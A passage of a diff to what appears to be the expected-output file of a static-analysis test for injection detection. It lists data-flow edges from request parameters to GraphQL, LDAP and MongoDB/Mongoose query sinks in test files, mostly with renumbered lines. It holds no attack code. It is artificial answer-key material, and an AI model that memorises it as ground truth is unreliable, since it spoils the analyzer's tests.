graphql.js:29:39:29:40 | id | graphql.js:29:32:29:42 | `foo ${id}` | provenance | | +| graphql.js:32:25:32:26 | id | graphql.js:32:18:32:28 | `foo ${id}` | provenance | | +| graphql.js:38:11:38:28 | id | graphql.js:43:21:43:22 | id | provenance | | +| graphql.js:38:11:38:28 | id | graphql.js:47:51:47:52 | id | provenance | | +| graphql.js:38:16:38:28 | req.params.id | graphql.js:38:11:38:28 | id | provenance | | +| graphql.js:43:21:43:22 | id | graphql.js:43:14:43:24 | `foo ${id}` | provenance | | +| graphql.js:47:51:47:52 | id | graphql.js:47:44:47:54 | `foo ${id}` | provenance | | +| graphql.js:54:11:54:28 | id | graphql.js:55:46:55:47 | id | provenance | | +| graphql.js:54:11:54:28 | id | graphql.js:57:73:57:74 | id | provenance | | +| graphql.js:54:16:54:28 | req.params.id | graphql.js:54:11:54:28 | id | provenance | | +| graphql.js:55:46:55:47 | id | 
graphql.js:55:39:55:49 | `foo ${id}` | provenance | | +| graphql.js:57:73:57:74 | id | graphql.js:57:66:57:76 | `foo ${id}` | provenance | | +| graphql.js:73:9:73:25 | id | graphql.js:74:56:74:57 | id | provenance | | +| graphql.js:73:9:73:25 | id | graphql.js:86:13:86:14 | id | provenance | | +| graphql.js:73:14:73:25 | req.query.id | graphql.js:73:9:73:25 | id | provenance | | +| graphql.js:74:56:74:57 | id | graphql.js:74:46:74:64 | "{ foo" + id + " }" | provenance | | +| graphql.js:86:13:86:14 | id | graphql.js:82:14:88:8 | `{ // $ ... }` | provenance | | +| graphql.js:117:11:117:28 | id | graphql.js:118:45:118:46 | id | provenance | | +| graphql.js:117:16:117:28 | req.params.id | graphql.js:117:11:117:28 | id | provenance | | +| graphql.js:118:45:118:46 | id | graphql.js:118:38:118:48 | `foo ${id}` | provenance | | | html-sanitizer.js:13:39:13:44 | param1 | html-sanitizer.js:14:18:14:23 | param1 | provenance | | | html-sanitizer.js:14:5:14:24 | param1 | html-sanitizer.js:16:54:16:59 | param1 | provenance | | | html-sanitizer.js:14:14:14:24 | xss(param1) | html-sanitizer.js:14:5:14:24 | param1 | provenance | | 
@@ -351,209 +351,209 @@ edges | ldap.js:64:38:64:45 | username | ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | provenance | | | ldap.js:66:40:66:51 | parsedFilter | ldap.js:66:30:66:53 | { filte ... ilter } | provenance | Config | | ldap.js:68:33:68:40 | username | ldap.js:68:27:68:42 | `cn=${username}` | provenance | | -| marsdb-flow-to.js:10:9:10:18 | query | marsdb-flow-to.js:14:17:14:21 | query | provenance | | +| marsdb-flow-to.js:10:9:10:18 | query | marsdb-flow-to.js:13:17:13:21 | query | provenance | | | marsdb-flow-to.js:10:17:10:18 | {} | marsdb-flow-to.js:10:9:10:18 | query | provenance | | | marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:11:17:11:30 | req.body.title | provenance | Config | | marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:10:9:10:18 | query | provenance | Config | | marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:10:17:10:18 | {} | provenance | Config | -| marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:14:17:14:21 | query | provenance | Config | -| marsdb.js:12:9:12:18 | query | marsdb.js:16:12:16:16 | query | provenance | | +| marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:13:17:13:21 | query | provenance | Config | +| marsdb.js:12:9:12:18 | query | marsdb.js:15:12:15:16 | query | provenance | | | marsdb.js:12:17:12:18 | {} | marsdb.js:12:9:12:18 | query | provenance | | | marsdb.js:13:17:13:24 | req.body | marsdb.js:13:17:13:30 | req.body.title | provenance | Config | | marsdb.js:13:17:13:30 | req.body.title | marsdb.js:12:9:12:18 | query | provenance | Config | | marsdb.js:13:17:13:30 | req.body.title | marsdb.js:12:17:12:18 | {} | provenance | Config | -| marsdb.js:13:17:13:30 | req.body.title | marsdb.js:16:12:16:16 | query | provenance | Config | -| minimongo.js:14:9:14:18 | query | minimongo.js:18:12:18:16 | query | provenance | | +| marsdb.js:13:17:13:30 | req.body.title | marsdb.js:15:12:15:16 | query | provenance | Config | +| 
minimongo.js:14:9:14:18 | query | minimongo.js:17:12:17:16 | query | provenance | | | minimongo.js:14:17:14:18 | {} | minimongo.js:14:9:14:18 | query | provenance | | | minimongo.js:15:17:15:24 | req.body | minimongo.js:15:17:15:30 | req.body.title | provenance | Config | | minimongo.js:15:17:15:30 | req.body.title | minimongo.js:14:9:14:18 | query | provenance | Config | | minimongo.js:15:17:15:30 | req.body.title | minimongo.js:14:17:14:18 | {} | provenance | Config | -| minimongo.js:15:17:15:30 | req.body.title | minimongo.js:18:12:18:16 | query | provenance | Config | +| minimongo.js:15:17:15:30 | req.body.title | minimongo.js:17:12:17:16 | query | provenance | Config | | mongodb.js:12:11:12:20 | query | mongodb.js:13:5:13:9 | query | provenance | | | mongodb.js:12:19:12:20 | {} | mongodb.js:12:11:12:20 | query | provenance | | -| mongodb.js:13:5:13:9 | query | mongodb.js:18:16:18:20 | query | provenance | | +| mongodb.js:13:5:13:9 | query | mongodb.js:17:16:17:20 | query | provenance | | | mongodb.js:13:19:13:26 | req.body | mongodb.js:13:19:13:32 | req.body.title | provenance | Config | | mongodb.js:13:19:13:32 | req.body.title | mongodb.js:12:11:12:20 | query | provenance | Config | | mongodb.js:13:19:13:32 | req.body.title | mongodb.js:12:19:12:20 | {} | provenance | Config | | mongodb.js:13:19:13:32 | req.body.title | mongodb.js:13:5:13:9 | query | provenance | Config | -| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:18:16:18:20 | query | provenance | Config | -| mongodb.js:26:11:26:32 | title | mongodb.js:32:38:32:42 | title | provenance | | -| mongodb.js:26:19:26:26 | req.body | mongodb.js:26:19:26:32 | req.body.title | provenance | Config | -| mongodb.js:26:19:26:32 | req.body.title | mongodb.js:26:11:26:32 | title | provenance | | -| mongodb.js:32:27:32:43 | JSON.parse(title) | mongodb.js:32:18:32:45 | { title ... 
itle) } | provenance | Config | -| mongodb.js:32:38:32:42 | title | mongodb.js:32:27:32:43 | JSON.parse(title) | provenance | Config | -| mongodb.js:48:11:48:20 | query | mongodb.js:49:5:49:9 | query | provenance | | -| mongodb.js:48:19:48:20 | {} | mongodb.js:48:11:48:20 | query | provenance | | -| mongodb.js:49:5:49:9 | query | mongodb.js:54:16:54:20 | query | provenance | | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:48:11:48:20 | query | provenance | Config | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:48:19:48:20 | {} | provenance | Config | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:49:5:49:9 | query | provenance | Config | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:54:16:54:20 | query | provenance | Config | -| mongodb.js:59:8:59:17 | query | mongodb.js:60:2:60:6 | query | provenance | | -| mongodb.js:59:16:59:17 | {} | mongodb.js:59:8:59:17 | query | provenance | | -| mongodb.js:60:2:60:6 | query | mongodb.js:65:12:65:16 | query | provenance | | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:59:8:59:17 | query | provenance | Config | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:59:16:59:17 | {} | provenance | Config | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:60:2:60:6 | query | provenance | Config | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:65:12:65:16 | query | provenance | Config | -| mongodb.js:70:7:70:25 | tag | mongodb.js:77:22:77:24 | tag | provenance | | -| mongodb.js:70:7:70:25 | tag | mongodb.js:85:20:85:22 | tag | provenance | | -| mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:70:7:70:25 | tag | provenance | | -| mongodb.js:77:22:77:24 | tag | mongodb.js:77:14:77:26 | { tags: tag } | provenance | Config | -| mongodb.js:85:20:85:22 | tag | mongodb.js:85:12:85:24 | { tags: tag } | provenance | Config | -| mongodb.js:106:9:106:18 | query | mongodb.js:107:3:107:7 | query | provenance | | -| mongodb.js:106:17:106:18 | {} | 
mongodb.js:106:9:106:18 | query | provenance | | -| mongodb.js:107:3:107:7 | query | mongodb.js:112:14:112:18 | query | provenance | | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:106:9:106:18 | query | provenance | Config | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:106:17:106:18 | {} | provenance | Config | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:107:3:107:7 | query | provenance | Config | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:112:14:112:18 | query | provenance | Config | +| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:17:16:17:20 | query | provenance | Config | +| mongodb.js:25:11:25:32 | title | mongodb.js:30:38:30:42 | title | provenance | | +| mongodb.js:25:19:25:26 | req.body | mongodb.js:25:19:25:32 | req.body.title | provenance | Config | +| mongodb.js:25:19:25:32 | req.body.title | mongodb.js:25:11:25:32 | title | provenance | | +| mongodb.js:30:27:30:43 | JSON.parse(title) | mongodb.js:30:18:30:45 | { title ... 
itle) } | provenance | Config | +| mongodb.js:30:38:30:42 | title | mongodb.js:30:27:30:43 | JSON.parse(title) | provenance | Config | +| mongodb.js:46:11:46:20 | query | mongodb.js:47:5:47:9 | query | provenance | | +| mongodb.js:46:19:46:20 | {} | mongodb.js:46:11:46:20 | query | provenance | | +| mongodb.js:47:5:47:9 | query | mongodb.js:51:16:51:20 | query | provenance | | +| mongodb.js:47:19:47:33 | req.query.title | mongodb.js:46:11:46:20 | query | provenance | Config | +| mongodb.js:47:19:47:33 | req.query.title | mongodb.js:46:19:46:20 | {} | provenance | Config | +| mongodb.js:47:19:47:33 | req.query.title | mongodb.js:47:5:47:9 | query | provenance | Config | +| mongodb.js:47:19:47:33 | req.query.title | mongodb.js:51:16:51:20 | query | provenance | Config | +| mongodb.js:56:8:56:17 | query | mongodb.js:57:2:57:6 | query | provenance | | +| mongodb.js:56:16:56:17 | {} | mongodb.js:56:8:56:17 | query | provenance | | +| mongodb.js:57:2:57:6 | query | mongodb.js:61:12:61:16 | query | provenance | | +| mongodb.js:57:16:57:30 | req.query.title | mongodb.js:56:8:56:17 | query | provenance | Config | +| mongodb.js:57:16:57:30 | req.query.title | mongodb.js:56:16:56:17 | {} | provenance | Config | +| mongodb.js:57:16:57:30 | req.query.title | mongodb.js:57:2:57:6 | query | provenance | Config | +| mongodb.js:57:16:57:30 | req.query.title | mongodb.js:61:12:61:16 | query | provenance | Config | +| mongodb.js:66:7:66:25 | tag | mongodb.js:72:22:72:24 | tag | provenance | | +| mongodb.js:66:7:66:25 | tag | mongodb.js:79:20:79:22 | tag | provenance | | +| mongodb.js:66:13:66:25 | req.query.tag | mongodb.js:66:7:66:25 | tag | provenance | | +| mongodb.js:72:22:72:24 | tag | mongodb.js:72:14:72:26 | { tags: tag } | provenance | Config | +| mongodb.js:79:20:79:22 | tag | mongodb.js:79:12:79:24 | { tags: tag } | provenance | Config | +| mongodb.js:100:9:100:18 | query | mongodb.js:101:3:101:7 | query | provenance | | +| mongodb.js:100:17:100:18 | {} | 
mongodb.js:100:9:100:18 | query | provenance | | +| mongodb.js:101:3:101:7 | query | mongodb.js:105:14:105:18 | query | provenance | | +| mongodb.js:101:17:101:29 | queries.title | mongodb.js:100:9:100:18 | query | provenance | Config | +| mongodb.js:101:17:101:29 | queries.title | mongodb.js:100:17:100:18 | {} | provenance | Config | +| mongodb.js:101:17:101:29 | queries.title | mongodb.js:101:3:101:7 | query | provenance | Config | +| mongodb.js:101:17:101:29 | queries.title | mongodb.js:105:14:105:18 | query | provenance | Config | | mongodb_bodySafe.js:23:11:23:20 | query | mongodb_bodySafe.js:24:5:24:9 | query | provenance | | | mongodb_bodySafe.js:23:19:23:20 | {} | mongodb_bodySafe.js:23:11:23:20 | query | provenance | | -| mongodb_bodySafe.js:24:5:24:9 | query | mongodb_bodySafe.js:29:16:29:20 | query | provenance | | +| mongodb_bodySafe.js:24:5:24:9 | query | mongodb_bodySafe.js:28:16:28:20 | query | provenance | | | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:23:11:23:20 | query | provenance | Config | | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:23:19:23:20 | {} | provenance | Config | | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:24:5:24:9 | query | provenance | Config | -| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:29:16:29:20 | query | provenance | Config | +| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:28:16:28:20 | query | provenance | Config | | mongoose.js:20:8:20:17 | query | mongoose.js:21:2:21:6 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:24:22:24:26 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:27:17:27:21 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:30:22:30:26 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:33:21:33:25 | query | provenance | | -| mongoose.js:20:8:20:17 | query | 
mongoose.js:36:28:36:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:39:16:39:20 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:42:19:42:23 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:45:28:45:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:48:28:48:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:51:28:51:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:54:22:54:26 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:57:18:57:22 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:60:22:60:26 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:63:21:63:25 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:65:32:65:36 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:67:27:67:31 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:68:8:68:12 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:71:17:71:21 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:72:10:72:14 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:73:8:73:12 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:74:7:74:11 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:75:16:75:20 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:76:12:76:16 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:77:10:77:14 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:81:37:81:41 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:82:46:82:50 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:83:47:83:51 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:104:21:104:25 | query | provenance 
| | -| mongoose.js:20:8:20:17 | query | mongoose.js:111:14:111:18 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:113:31:113:35 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:133:38:133:42 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:136:30:136:34 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:23:22:23:26 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:25:17:25:21 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:27:22:27:26 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:29:21:29:25 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:31:28:31:32 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:33:16:33:20 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:35:19:35:23 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:37:28:37:32 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:39:28:39:32 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:41:28:41:32 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:43:22:43:26 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:45:18:45:22 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:47:22:47:26 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:49:21:49:25 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:51:32:51:36 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:53:27:53:31 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:54:8:54:12 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:57:17:57:21 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:58:10:58:14 | query | provenance | | +| mongoose.js:20:8:20:17 | query 
| mongoose.js:59:8:59:12 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:60:7:60:11 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:61:16:61:20 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:62:12:62:16 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:63:10:63:14 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:67:37:67:41 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:68:46:68:50 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:69:47:69:51 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:90:21:90:25 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:97:14:97:18 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:99:31:99:35 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:119:38:119:42 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:122:30:122:34 | query | provenance | | | mongoose.js:20:16:20:17 | {} | mongoose.js:20:8:20:17 | query | provenance | | -| mongoose.js:21:2:21:6 | query | mongoose.js:24:22:24:26 | query | provenance | | +| mongoose.js:21:2:21:6 | query | mongoose.js:23:22:23:26 | query | provenance | | | mongoose.js:21:16:21:23 | req.body | mongoose.js:21:16:21:29 | req.body.title | provenance | Config | | mongoose.js:21:16:21:29 | req.body.title | mongoose.js:20:8:20:17 | query | provenance | Config | | mongoose.js:21:16:21:29 | req.body.title | mongoose.js:20:16:20:17 | {} | provenance | Config | | mongoose.js:21:16:21:29 | req.body.title | mongoose.js:21:2:21:6 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:24:22:24:26 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:27:17:27:21 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:30:22:30:26 | 
query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:33:21:33:25 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:36:28:36:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:39:16:39:20 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:42:19:42:23 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:45:28:45:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:48:28:48:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:51:28:51:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:54:22:54:26 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:57:18:57:22 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:60:22:60:26 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:63:21:63:25 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:65:32:65:36 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:67:27:67:31 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:68:8:68:12 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:71:17:71:21 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:72:10:72:14 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:73:8:73:12 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:74:7:74:11 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:75:16:75:20 | query | provenance | Config | -| mongoose.js:21:16:21:29 | 
req.body.title | mongoose.js:76:12:76:16 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:77:10:77:14 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:81:37:81:41 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:23:22:23:26 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:25:17:25:21 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:27:22:27:26 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:29:21:29:25 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:31:28:31:32 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:33:16:33:20 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:35:19:35:23 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:37:28:37:32 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:39:28:39:32 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:41:28:41:32 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:43:22:43:26 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:45:18:45:22 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:47:22:47:26 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:49:21:49:25 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:51:32:51:36 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:53:27:53:31 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:54:8:54:12 | query | provenance 
| Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:57:17:57:21 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:58:10:58:14 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:59:8:59:12 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:60:7:60:11 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:61:16:61:20 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:62:12:62:16 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:63:10:63:14 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:67:37:67:41 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:68:46:68:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:69:47:69:51 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:71:46:71:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:73:51:73:55 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:75:46:75:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:78:46:78:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:80:51:80:55 | query | provenance | Config | | mongoose.js:21:16:21:29 | req.body.title | mongoose.js:82:46:82:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:83:47:83:51 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:85:46:85:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:87:51:87:55 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | 
mongoose.js:89:46:89:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:92:46:92:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:94:51:94:55 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:96:46:96:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:104:21:104:25 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:111:14:111:18 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:113:31:113:35 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:133:38:133:42 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:136:30:136:34 | query | provenance | Config | -| mongoose.js:24:22:24:26 | query | mongoose.js:24:21:24:27 | [query] | provenance | Config | -| mongoose.js:24:22:24:26 | query | mongoose.js:27:17:27:21 | query | provenance | | -| mongoose.js:27:17:27:21 | query | mongoose.js:30:22:30:26 | query | provenance | | -| mongoose.js:30:22:30:26 | query | mongoose.js:33:21:33:25 | query | provenance | | -| mongoose.js:33:21:33:25 | query | mongoose.js:36:28:36:32 | query | provenance | | -| mongoose.js:36:28:36:32 | query | mongoose.js:39:16:39:20 | query | provenance | | -| mongoose.js:39:16:39:20 | query | mongoose.js:42:19:42:23 | query | provenance | | -| mongoose.js:42:19:42:23 | query | mongoose.js:45:28:45:32 | query | provenance | | -| mongoose.js:45:28:45:32 | query | mongoose.js:48:28:48:32 | query | provenance | | -| mongoose.js:48:28:48:32 | query | mongoose.js:51:28:51:32 | query | provenance | | -| mongoose.js:51:28:51:32 | query | mongoose.js:54:22:54:26 | query | provenance | | -| mongoose.js:54:22:54:26 | query | mongoose.js:57:18:57:22 | query | provenance | | -| mongoose.js:57:18:57:22 | query | mongoose.js:60:22:60:26 | query | 
provenance | | -| mongoose.js:60:22:60:26 | query | mongoose.js:63:21:63:25 | query | provenance | | -| mongoose.js:63:21:63:25 | query | mongoose.js:65:32:65:36 | query | provenance | | -| mongoose.js:65:32:65:36 | query | mongoose.js:67:27:67:31 | query | provenance | | -| mongoose.js:67:27:67:31 | query | mongoose.js:68:8:68:12 | query | provenance | | -| mongoose.js:68:8:68:12 | query | mongoose.js:71:17:71:21 | query | provenance | | -| mongoose.js:71:17:71:21 | query | mongoose.js:72:10:72:14 | query | provenance | | -| mongoose.js:72:10:72:14 | query | mongoose.js:73:8:73:12 | query | provenance | | -| mongoose.js:73:8:73:12 | query | mongoose.js:74:7:74:11 | query | provenance | | -| mongoose.js:74:7:74:11 | query | mongoose.js:75:16:75:20 | query | provenance | | -| mongoose.js:75:16:75:20 | query | mongoose.js:76:12:76:16 | query | provenance | | -| mongoose.js:76:12:76:16 | query | mongoose.js:77:10:77:14 | query | provenance | | -| mongoose.js:77:10:77:14 | query | mongoose.js:81:37:81:41 | query | provenance | | -| mongoose.js:81:37:81:41 | query | mongoose.js:82:46:82:50 | query | provenance | | -| mongoose.js:82:46:82:50 | query | mongoose.js:83:47:83:51 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:85:46:85:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:87:51:87:55 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:89:46:89:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:92:46:92:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:94:51:94:55 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:96:46:96:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:104:21:104:25 | query | provenance | | -| mongoose.js:104:21:104:25 | query | mongoose.js:111:14:111:18 | query | provenance | | -| mongoose.js:111:14:111:18 | query | mongoose.js:113:31:113:35 | query | provenance | | -| 
mongoose.js:113:31:113:35 | query | mongoose.js:133:38:133:42 | query | provenance | | -| mongoose.js:115:6:115:22 | id | mongoose.js:123:20:123:21 | id | provenance | | -| mongoose.js:115:6:115:22 | id | mongoose.js:130:23:130:24 | id | provenance | | -| mongoose.js:115:11:115:22 | req.query.id | mongoose.js:115:6:115:22 | id | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:116:22:116:25 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:117:21:117:24 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:118:21:118:24 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:119:18:119:21 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:120:22:120:25 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:121:16:121:19 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:122:19:122:22 | cond | provenance | | -| 